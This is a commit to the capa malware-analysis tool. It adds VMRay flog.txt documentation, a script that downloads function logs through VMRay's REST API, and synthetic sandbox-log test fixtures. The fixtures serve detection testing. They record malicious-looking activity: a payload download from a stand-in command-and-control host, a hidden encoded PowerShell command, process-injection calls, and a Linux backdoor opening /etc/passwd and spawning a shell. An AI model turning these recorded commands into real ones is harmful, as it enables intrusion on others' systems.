vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt

devs6186 · devs6186 · commit b58fbeb016a0 · 2026-02-23T16:31:29.000+05:30
Addresses reviewer feedback on #2878:

1. Document the flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size).
2. Add scripts/fetch-vmray-flog.py: given a VMRay instance URL, API key, and sample SHA-256, it downloads flog.txt via the REST API and optionally runs capa against it.
3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files:
   - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process
   - linux_syscalls.flog.txt: Linux sys_-prefixed calls (the sys_ prefix is stripped from every call)
   - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty

tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (a double backslash must not appear; the sys_ prefix must not appear).

Fixes #2878
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -6,6 +6,7 @@
 
 - ghidra: support PyGhidra @mike-hunhoff #2788
 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
+- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
 
 ### Breaking Changes
diff --git a/doc/usage.md b/doc/usage.md
@@ -12,6 +12,36 @@ See `capa -h` for all supported arguments and usage examples.
 | [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output |
 | [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar |
 
+## VMRay: flog.txt vs full analysis archive
+
+When analysing VMRay output, you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
+Choose based on what you have access to and which features you need.
+
+| Feature | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
+|-|-|-|
+| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
+| **File size** | Small text file | Large encrypted ZIP |
+| **Dynamic API calls** | ✓ | ✓ |
+| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
+| **Static imports / exports** | ✗ | ✓ |
+| **PE/ELF section names** | ✗ | ✓ |
+| **Embedded file strings** | ✗ | ✓ |
+| **Base address** | ✗ | ✓ |
+
+**When to use flog.txt:** You only have access to the VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely available function log.
+
+**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
+
+```
+# flog.txt — free, limited to dynamic API calls
+capa path/to/flog.txt
+
+# Full VMRay archive — requires subscription, richer features
+capa path/to/analysis_archive.zip
+```
+
 ## tips and tricks
 
 ### only run selected rules
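Since capa accepts both inputs, it can help to check which one a downloaded file actually is before running it. The two can be told apart from their first bytes: a regular (non-empty) ZIP file starts with the local-file-header magic `PK\x03\x04`, while the function logs in this commit's fixtures are plain text whose header comments include a `# Flog Txt Version` line. The sketch below is a hypothetical helper (`guess_vmray_input_kind` is not part of capa) and assumes those two markers are sufficient; capa's own format detection may use different checks.

```python
from pathlib import Path

# ZIP local-file-header magic, found at offset 0 of a regular (non-empty) ZIP file.
ZIP_MAGIC = b"PK\x03\x04"
# Header comment seen in the flog.txt fixtures in this commit.
FLOG_TXT_MARKER = b"# Flog Txt Version"


def guess_vmray_input_kind(data: bytes) -> str:
    """Classify raw content as 'archive', 'flog.txt', or 'unknown' (hypothetical helper)."""
    if data.startswith(ZIP_MAGIC):
        return "archive"
    # The flog.txt header is a handful of '#' comment lines, so only inspect the first few lines.
    for line in data.splitlines()[:10]:
        if line.strip().startswith(FLOG_TXT_MARKER):
            return "flog.txt"
    return "unknown"


def guess_file_kind(path: Path) -> str:
    # 4 KiB comfortably covers the header comments of a function log.
    with path.open("rb") as f:
        return guess_vmray_input_kind(f.read(4096))
```

For example, `guess_file_kind(Path("sample_flog.txt"))` returns `"flog.txt"` for a file whose header matches the fixtures in this commit.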
diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py
@@ -0,0 +1,270 @@
+#!/usr/bin/env python3
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
+
+Given a sample SHA-256 hash and VMRay credentials, this script:
+  1. Looks up the sample on the VMRay instance.
+  2. Finds the most recent analysis for that sample.
+  3. Downloads the flog.txt (Download Function Log) for that analysis.
+  4. Optionally runs capa against the downloaded file.
+
+Requirements:
+  pip install requests
+
+Usage::
+
+    python scripts/fetch-vmray-flog.py \\
+        --url  https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --output /tmp/sample_flog.txt
+
+    # Fetch and immediately run capa:
+    python scripts/fetch-vmray-flog.py \\
+        --url  https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --run-capa
+
+VMRay API reference:
+  https://docs.vmray.com/documents/api-reference/
+
+Note: this script requires a VMRay account.  The flog.txt itself is freely available
+("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
+programmatically via the REST API requires valid API credentials.
+"""
+
+import argparse
+import logging
+import subprocess
+import sys
+from pathlib import Path
+
+import requests
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# VMRay REST API helpers
+# ---------------------------------------------------------------------------
+
+_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
+
+
+def _session(url: str, apikey: str) -> requests.Session:
+    """Return an authenticated requests.Session for the given VMRay instance."""
+    s = requests.Session()
+    s.headers.update(
+        {
+            "Authorization": f"api_key {apikey}",
+            "Accept": "application/json",
+        }
+    )
+    s.verify = True  # set to False only when using self-signed certificates
+    s.base_url = url.rstrip("/")  # type: ignore[attr-defined]
+    return s
+
+
+def _get(session: requests.Session, path: str, **kwargs) -> dict:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.json()
+
+
+def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.content
+
+
+def lookup_sample(session: requests.Session, sha256: str) -> dict:
+    """
+    Return the VMRay sample record for the given SHA-256.
+    Raises ValueError if the sample is not found.
+    """
+    data = _get(session, f"/rest/sample/sha256/{sha256}")
+    if data.get("result") != "ok" or not data.get("data"):
+        raise ValueError(f"sample not found on VMRay instance: {sha256}")
+    # data["data"] is a list; take the first entry
+    return data["data"][0]
+
+
+def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
+    """
+    Return the most recent analysis (highest analysis_id) for the given VMRay sample ID.
+    Note: the analysis status is not checked.
+    Raises ValueError if no analysis is found.
+    """
+    data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
+    analyses = data.get("data", [])
+    if not analyses:
+        raise ValueError(f"no analyses found for sample_id={sample_id}")
+    # assumes analysis IDs increase over time, so the highest ID is the newest analysis
+    return max(analyses, key=lambda a: a.get("analysis_id", 0))
+
+
+def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
+    """
+    Download the flog.txt content for the given VMRay analysis ID.
+
+    Tries the dedicated function-log export endpoint first; on an HTTP error or an
+    empty response, falls back to the analysis archive endpoint with the
+    ``file_filter[]`` query parameter (that response may be a ZIP, not raw text).
+    """
+    # Try the dedicated log endpoint first (VMRay >= 2024.x)
+    try:
+        content = _get_bytes(
+            session,
+            f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
+        )
+        if content:
+            return content
+    except requests.HTTPError:
+        pass
+
+    # Fallback: download via the analysis archive with a file filter
+    content = _get_bytes(
+        session,
+        f"/rest/analysis/{analysis_id}/archive",
+        params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
+    )
+    return content
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv=None):
+    if argv is None:
+        argv = sys.argv[1:]
+
+    parser = argparse.ArgumentParser(
+        description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
+    )
+    parser.add_argument(
+        "--url",
+        required=True,
+        metavar="URL",
+        help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
+    )
+    parser.add_argument(
+        "--apikey",
+        required=True,
+        metavar="KEY",
+        help="VMRay REST API key (Settings → API Keys).",
+    )
+    parser.add_argument(
+        "--sha256",
+        required=True,
+        metavar="SHA256",
+        help="SHA-256 hash of the sample to analyse.",
+    )
+    parser.add_argument(
+        "--output",
+        metavar="PATH",
+        help="Where to save the downloaded flog.txt.  Defaults to <sha256>_flog.txt in the current directory.",
+    )
+    parser.add_argument(
+        "--run-capa",
+        action="store_true",
+        dest="run_capa",
+        help="After downloading, run 'capa <output>' and print the results.",
+    )
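+    parser.add_argument(
+        "--capa-args",
+        metavar="ARGS",
+        default="",
+        help="Extra arguments forwarded to capa as one whitespace-separated string (only used with --run-capa). Use the --capa-args=VALUE form when VALUE starts with '-', e.g. --capa-args='-v'.",
+    )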
+    parser.add_argument(
+        "--no-verify-ssl",
+        action="store_false",
+        dest="verify_ssl",
+        help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
+    )
+    parser.add_argument(
+        "-d", "--debug", action="store_true", help="Enable debug logging."
+    )
+    args = parser.parse_args(argv)
+
+    logging.basicConfig(
+        level=logging.DEBUG if args.debug else logging.INFO,
+        format="%(levelname)s: %(message)s",
+    )
+
+    output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
+
+    session = _session(args.url, args.apikey)
+    session.verify = args.verify_ssl  # type: ignore[assignment]
+
+    # Step 1 — look up sample
+    logger.info("looking up sample %s …", args.sha256)
+    try:
+        sample = lookup_sample(session, args.sha256)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find sample: %s", exc)
+        return 1
+
+    sample_id: int = sample["sample_id"]
+    logger.debug("found sample_id=%d", sample_id)
+
+    # Step 2 — find the latest analysis
+    logger.info("fetching analysis list for sample_id=%d …", sample_id)
+    try:
+        analysis = get_latest_analysis(session, sample_id)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find analysis: %s", exc)
+        return 1
+
+    analysis_id: int = analysis["analysis_id"]
+    logger.debug("using analysis_id=%d", analysis_id)
+
+    # Step 3 — download flog.txt
+    logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
+    try:
+        flog_bytes = download_flog_txt(session, analysis_id)
+    except requests.HTTPError as exc:
+        logger.error("failed to download flog.txt: %s", exc)
+        return 1
+
+    if not flog_bytes:
+        logger.error(
+            "received empty response — flog.txt may not be available for this analysis"
+        )
+        return 1
+
+    output_path.write_bytes(flog_bytes)
+    logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
+
+    # Step 4 (optional) — run capa
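+    if args.run_capa:
+        capa_cmd = ["capa", str(output_path)] + (
+            args.capa_args.split() if args.capa_args else []
+        )
+        logger.info("running: %s", " ".join(capa_cmd))
+        try:
+            result = subprocess.run(capa_cmd)
+        except FileNotFoundError:
+            logger.error("capa not found on PATH; run it manually: capa %s", output_path)
+            return 1
+        return result.returncode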
+
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
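In the script above, `download_flog_txt` falls back to the `/archive` endpoint, and `main` writes whatever comes back straight to the output file. If that endpoint returns a ZIP (as an archive download normally would; this is an assumption about VMRay's behaviour, not something the commit confirms), the saved file will not be a function log. A minimal guard, sketched here as a hypothetical `ensure_flog_text` helper that is not part of the commit, unwraps a ZIP payload and passes plain text through unchanged. The member basenames it looks for and the optional `pwd` for password-protected archives are assumptions.

```python
import io
import zipfile
from typing import Optional

ZIP_MAGIC = b"PK\x03\x04"
# Assumed basenames of the function-log member inside a VMRay archive.
FLOG_MEMBER_NAMES = ("flog.txt", "flog_txt")


def ensure_flog_text(payload: bytes, pwd: Optional[bytes] = None) -> bytes:
    """Return raw flog.txt bytes, unpacking them from a ZIP payload if needed (hypothetical helper)."""
    if not payload.startswith(ZIP_MAGIC):
        # Already plain text, e.g. from the dedicated function-log endpoint.
        return payload

    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        # Match on the last path component so "logs/flog.txt" is found as well.
        candidates = [
            name for name in zf.namelist() if name.rsplit("/", 1)[-1] in FLOG_MEMBER_NAMES
        ]
        if not candidates:
            raise ValueError("archive does not contain a flog.txt member")
        # pwd is only needed if the archive is password-protected.
        return zf.read(candidates[0], pwd=pwd)
```

Wired into `main`, this would look like `flog_bytes = ensure_flog_text(download_flog_txt(session, analysis_id))`. Checking the magic bytes rather than which endpoint answered keeps the guard correct regardless of the path taken.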
diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt
@@ -0,0 +1,43 @@
+# Log Creation Date: 02.01.2025 12:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x1234"
+os_parent_pid = "0x1"
+parent_id = "0"
+image_name = "backdoor"
+filename = "/tmp/backdoor"
+cmd_line = "/tmp/backdoor"
+monitor_reason = "analysis_target"
+
+Region:
+id = "1"
+name = "stack"
+
+Thread:
+id = "1"
+os_tid = "0x1234"
+ [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
+ [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
+ [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
+ [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+ [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
+ [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
+ [0001.006] sys_fork () returned 0x2345
+ [0001.007] sys_getuid () returned 0x0
+ [0001.008] sys_setuid (uid=0x0) returned 0x0
+ [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
+ [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
+ [0001.011] sys_time (tloc=0x0) returned 0x677f2000
+ [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
+ [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
+ [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
+ [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
+ [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
+ [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+ [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
+ [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
+ [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
+ [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40
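Every call line in this fixture has the shape `[<seq>] <name> (<args>) returned <value>`, and the regression tests require that the Linux `sys_` prefix never survives extraction. A minimal sketch of that call-line handling follows, assuming every call line matches that shape and has a numeric return value; the regex and the `parse_call_line` and `normalize_api_name` names are illustrative, not capa's actual parser.

```python
import re
from typing import NamedTuple

# [seq] name (args) returned value; the greedy args group stops at the last ")" before "returned".
CALL_LINE = re.compile(
    r"^\s*\[(?P<seq>\d+\.\d+)\]\s+(?P<api>\S+)\s*\((?P<args>.*)\)\s+returned\s+(?P<ret>\S+)\s*$"
)


class Call(NamedTuple):
    seq: str
    api: str
    raw_args: str
    ret: int


def normalize_api_name(name: str) -> str:
    # Linux syscalls are logged as sys_<name>; strip the prefix exactly once.
    return name[len("sys_"):] if name.startswith("sys_") else name


def parse_call_line(line: str) -> Call:
    m = CALL_LINE.match(line)
    if m is None:
        raise ValueError(f"not a call line: {line!r}")
    # int(x, 0) accepts both hex ("0x100") and decimal ("256") return values.
    return Call(m["seq"], normalize_api_name(m["api"]), m["args"], int(m["ret"], 0))
```

With this split, `sys_read` becomes `read` while Windows names such as `CreateFileW` pass through untouched, so the same parser can serve both fixture families.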
diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt
@@ -0,0 +1,37 @@
+# Log Creation Date: 03.01.2025 08:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x2000"
+os_parent_pid = "0x4"
+parent_id = "0"
+image_name = "edgecase.exe"
+filename = "c:\\users\\test\\edgecase.exe"
+cmd_line = "edgecase.exe"
+monitor_reason = "analysis_target"
+
+Region:
+id = "5"
+name = "private_0x0000000000010000"
+
+Thread:
+id = "1"
+os_tid = "0x2100"
+ [0001.000] GetCurrentProcess () returned 0xffffffffffffffff
+ [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
+ [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
+ [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
+ [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
+ [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
+ [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
+ [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
+ [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
+ [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
+ [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
+ [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
+ [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
+ [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
+ [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
+ [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200
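The cases in this fixture (quoted paths with spaces, UNC paths written as `\\\\server`, empty strings, `=` and commas inside quoted text, `NULL`, decimal values such as `len=256` next to hex ones) are exactly what break a naive `split(",")` over the argument list. Below is a sketch of a quote-aware argument parser, assuming that inside quotes a backslash is escaped as `\\` and a quote as `\"`, and that other backslash sequences (such as the `\n` in the `MessageBoxW` text) should be kept literally. That escaping convention and all helper names are assumptions for illustration, not taken from capa.

```python
from typing import Dict, List, Union

ArgValue = Union[str, int, None]


def split_args(raw: str) -> List[str]:
    """Split 'a=1, b="x, y"' on commas that are outside double-quoted strings."""
    parts: List[str] = []
    buf: List[str] = []
    in_str = False
    i = 0
    while i < len(raw):
        ch = raw[i]
        if in_str and ch == "\\" and i + 1 < len(raw):
            # Copy escape pairs verbatim so an escaped quote cannot end the string.
            buf.append(raw[i : i + 2])
            i += 2
            continue
        if ch == '"':
            in_str = not in_str
        if ch == "," and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    tail = "".join(buf).strip()
    if tail:
        parts.append(tail)
    return parts


def unescape(s: str) -> str:
    # Collapse a doubled backslash to one and an escaped quote to a bare quote;
    # any other backslash sequence (e.g. a literal "\n") is kept as written.
    out: List[str] = []
    i = 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s) and s[i + 1] in '\\"':
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_value(text: str) -> ArgValue:
    if len(text) >= 2 and text[0] == text[-1] == '"':
        return unescape(text[1:-1])
    if text == "NULL":
        return None
    try:
        return int(text, 0)  # "0x10" -> 16, "4096" -> 4096
    except ValueError:
        return text  # anything else is returned unparsed


def parse_args(raw: str) -> Dict[str, ArgValue]:
    args: Dict[str, ArgValue] = {}
    for part in split_args(raw):
        # Split on the first '=' only, so '=' inside quoted values survives.
        name, _, value = part.partition("=")
        args[name.strip()] = parse_value(value.strip())
    return args
```

Decoding escapes only after splitting keeps the two concerns separate: the splitter only needs to know where strings end, and the "no double backslash" check in the tests then holds for every extracted string.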
diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt
diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py